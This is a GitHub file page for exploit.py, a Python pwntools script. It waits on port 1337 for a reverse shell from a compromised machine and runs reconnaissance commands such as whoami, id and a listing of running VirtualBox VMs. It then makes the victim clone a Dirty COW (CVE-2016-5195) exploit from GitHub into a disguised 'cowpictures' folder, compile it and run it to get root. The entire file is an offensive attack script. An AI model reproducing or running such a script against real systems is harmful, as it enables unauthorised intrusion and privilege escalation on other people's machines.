-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
executable file
·47 lines (45 loc) · 1.4 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#!/usr/bin/python2.7
from pwn import *
import time
client = listen(1337).wait_for_connection()
client.sendline('hostname')
print("[+] pwnded host!")
print("[+] Hostname:")
print(client.recv())
print("[+] User:")
client.sendline('whoami;id;')
print(client.recvline()+client.recvline())
#print(client.recvline())
print("[+] Running VMs on Host:")
client.sendline('VBoxManage list runningvms')
print(client.recvline())
print("[+] Getting root!")
client.sendline('export DISPLAY=:0')
print("[+] Display Variable exported!")
client.sendline('export PATH')
print("[+] PATH exported!")
client.sendline('cd /tmp')
########## clone and pwn ##########
print("[+]content of /tmp:")
client.sendline('ls')
print(client.recv())
print("[+] cloning exploit!")
client.sendline('git clone https://github.com/gbonacini/CVE-2016-5195 cowpictures')
print(client.recvline())
time.sleep(10)
# TODO make check if folder downloaded
print("[+] checking out some cow pictures!")
client.sendline('cd cowpictures')
print("[+] compiling exploit!")
client.sendline('make')
print(client.recv())
time.sleep(4)
print("[+] exploit compiled!")
###################################
#client.sendline('cd /home/hetti/Documents/pwnstuff/CVE-2016-5195-master')
print("[+] exploit ready!")
print("[+] exploiting!")
client.sendline('xterm -e "whoami;uname -a;/usr/games/cowsay man that pwnage is easy!;./dcow -s"')
print("[+] MUUUUUUUUUUUUUUH!")
print("[+] Enjoy")
time.sleep(60)